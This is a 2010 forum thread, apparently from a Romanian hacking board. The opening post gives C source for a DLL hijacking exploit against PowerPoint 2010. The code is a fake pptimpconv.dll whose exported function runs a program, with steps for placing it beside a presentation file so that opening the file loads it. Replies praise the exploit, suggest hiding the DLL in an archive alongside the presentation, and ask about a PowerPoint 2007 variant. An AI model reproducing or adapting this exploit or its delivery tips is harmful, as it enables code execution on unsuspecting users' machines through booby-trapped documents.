begood Posted August 24, 2010 Report Share Posted August 24, 2010 /*Exploit Title: Microsoft PowerPoint 2010 DLL Hijacking Exploit (pptimpconv.dll)Date: 24/08/2010Author: TheLeaderEmail: gsog2009 [a7] hotmail [d0t] comSoftware Link: http://office.microsoft.com/en-us/powerpoint/Version: 14.0.4760.1000Tested on: Windows 7 x86 (6.1.7600)Compile and rename to pptimpconv.dll, create a file in the same dir with one of the following extensions:.odp / .pot / .potm / .potx / .ppa / .pps / .ppsm / .ppsx / .ppt / .pptm / .pptx / .pwz / .sldm / .sldxThis exploit does _not_ get triggered with the following file extensions:.pothtml / .ppam / .ppthtml / .pptxml / .thmxDouble click & watch a nice calculator pop =]*More shouts* to all the great guys at forums.hacking.org.il*/#include <windows.h>#define DLLIMPORT __declspec (dllexport)DLLIMPORT void HrCreateConverter() { evil(); }int evil(){ WinExec("calc", 0); exit(0); return 0;} 1 Quote Link to comment Share on other sites More sharing options...
Nytro Posted August 24, 2010 Report Share Posted August 24, 2010 Dragut. Pacat ca nu pot testa de pe Linux.Se poate face o arhiva cu fisierul ppt/s si acest dll sa fie hidden, desi nici nu ar fi necesar. Quote Link to comment Share on other sites More sharing options...
qbert Posted August 24, 2010 Report Share Posted August 24, 2010 Microsoft DLL Hijacking Exploit in action <= video Quote Link to comment Share on other sites More sharing options...
Flubber Posted August 24, 2010 Report Share Posted August 24, 2010 I just had a jizz! o.OZirou dei, multam fain! Quote Link to comment Share on other sites More sharing options...
AlStar Posted August 24, 2010 Report Share Posted August 24, 2010 This is awesome Quote Link to comment Share on other sites More sharing options...
gabyyy Posted September 12, 2010 Report Share Posted September 12, 2010 pt powerpoint 2007 a reusit careva sa faca exploitul sa mearga? asta de aici Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll) Quote Link to comment Share on other sites More sharing options...